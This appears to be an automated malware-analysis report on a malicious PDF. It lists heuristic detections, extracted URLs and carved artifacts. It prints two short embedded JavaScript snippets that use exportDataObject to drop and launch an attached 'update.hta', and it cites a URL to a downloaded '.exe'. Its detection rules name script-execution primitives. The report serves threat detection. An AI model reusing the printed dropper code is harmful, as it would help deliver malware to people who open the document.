MALICIOUS
202
Risk Score
Machine Learning
- Nyx PDF Classifier suspicious score 0.3334
Heuristics 10
-
TrueType bitmap font + active content — CVE-2023-26369 related high PDF_CVE_2023_26369_RELATEDPDF embeds a TrueType font with bitmap tables (EBDT/sbix/CBDT) alongside exploit delivery indicators — CVE-2023-26369 exploits the sfac_GetSbitBitmap function in Adobe's libCoolType for arbitrary code execution. This CVE was actively exploited in the wild, but this rule does not validate the malformed EBLC/EBDT primitive.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
AcroForm button with action trigger low PDF_ACROFORM_BUTTONPDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
-
External URI low PDF_URIPDF contains an external URL action
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://github.com/vanhauser-thc/thc-hydra PDF link annotation
- http://localhost:3000/files/bypass.pdf-1778690614.exeIn extracted file (update.hta)
- https://wwww.microsoft.com0In extracted file (font_00_sfnt_off00000917.bin)
- http://en.wikipedia.org/wiki/MIT_LicenseIn extracted file (font_00_sfnt_off00000917.bin)
- http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_2010-07-06.crl0ZIn extracted file (font_00_sfnt_off00000917.bin)
- http://www.microsoft.com/pki/certs/MicCodSigPCA_2010-07-06.crt0In extracted file (font_00_sfnt_off00000917.bin)
- http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0ZIn extracted file (font_00_sfnt_off00000917.bin)
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0��In extracted file (font_00_sfnt_off00000917.bin)
- http://www.microsoft.com/PKI/docs/CPS/default.htm0@In extracted file (font_00_sfnt_off00000917.bin)
- http://www.microsoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl0lIn extracted file (font_00_sfnt_off00000917.bin)
- http://www.microsoft.com/pkiops/certs/Microsoft%20Time-Stamp%20PCA%202010(1).crt0In extracted file (font_00_sfnt_off00000917.bin)
- http://www.microsoft.com/pkiops/Docs/Repository.htm0In extracted file (font_00_sfnt_off00000917.bin)
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0In extracted file (font_00_sfnt_off00000917.bin)
- http://www.monotype.com/html/mtname/ms_symbol.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlMicrosoftIn extracted file (font_03_sfnt_off0001c41c.bin)
- http://www.monotype.com/html/type/license.htmlIn extracted file (font_03_sfnt_off0001c41c.bin)
- https://docs.microsoft.com/typography/abouthttp://lucasfonts.comMicrosoftIn extracted file (font_04_sfnt_off0001f946.bin)
- http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0ZIn extracted file (font_04_sfnt_off0001f946.bin)
- http://www.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0In extracted file (font_04_sfnt_off0001f946.bin)
Extracted artifacts 10
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
update.hta |
pdf-embedded-file | PDF EmbeddedFile object 61 at offset 0x258C2 | 810 bytes |
SHA-256: 902d25f2579ff40db8132b5d89f416a3da049b64e0622393b1bce5705c014c6e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 shell/COM execution token(s).
|
|||
javascript_obj0003_000.js |
pdf-javascript-stream | PDF /JS object 3 at offset 0x79 | 298 bytes |
SHA-256: 0f48b7c4abda397770c1057be30f7068e3b865da0acd88454265e016dc4c863f |
|||
Preview scriptFirst 1,000 lines of the extracted script
��
/ / * 5 / J 1 H * 4 : J D H T A * D B ' & J ' K
t r y {
t h i s . e x p o r t D a t a O b j e c t ( { c N a m e : " u p d a t e . h t a " , n L a u n c h : t r u e } ) ;
} c a t c h ( e ) {
a p p . a l e r t ( " E r r o r : " + e ) ;
}
|
|||
javascript_obj0065_001.js |
pdf-javascript-stream | PDF /JS object 65 at offset 0x25B9C | 356 bytes |
SHA-256: 2eedeb59aa5f44d086c0b87d071deb755bb416130deb83f0728977979d8da676 |
|||
Preview scriptFirst 1,000 lines of the extracted script
��
/ / * 5 / J 1 H * 4 : J D H T A
t r y {
t h i s . e x p o r t D a t a O b j e c t ( { c N a m e : " u p d a t e . h t a " , n L a u n c h : t r u e } ) ;
a p p . a l e r t ( " L a u n c h i n g u p d a t e . . . " ) ;
} c a t c h ( e ) {
a p p . a l e r t ( " E r r o r : " + e ) ;
}
|
|||
stream_017_off00000079.js |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x79 | 167 bytes |
SHA-256: 0b1535953e6197bac91d9f285f0f5c9d5ba816b31678c182e99974c7af502413 |
|||
stream_018_off00025b9c.js |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x25B9C | 188 bytes |
SHA-256: d5fcf54f10baefcebf2f135450be6bba59233b3064c4234f90de379588881bb7 |
|||
font_00_sfnt_off00000917.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x917 | 83708 bytes |
SHA-256: 197901c226eb147cd307d52ebe06271eb731fbb058afd9989de7e88bb33b5b3f |
|||
font_01_sfnt_off000091f6.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x91F6 | 78816 bytes |
SHA-256: 617ce02ccf024a1926b891a14ec9f43c978229b08c2b5a0541d9ad2c81b04563 |
|||
font_02_sfnt_off00011a72.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x11A72 | 101944 bytes |
SHA-256: f4c24523f0fd4691eb6e6d594b9c9fd03104779aec5df997e1280daa815b59c3 |
|||
font_03_sfnt_off0001c41c.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x1C41C | 11088 bytes |
SHA-256: 086b4c456dbe6f09f8c99517bcda6cd0f82646bc0cf77bf0a1e64dd9a7c38fd3 |
|||
font_04_sfnt_off0001f946.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x1F946 | 83164 bytes |
SHA-256: a961f68e2eb115095a55afaef0584b6798c4550624e360f978f5e74864d1186d |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.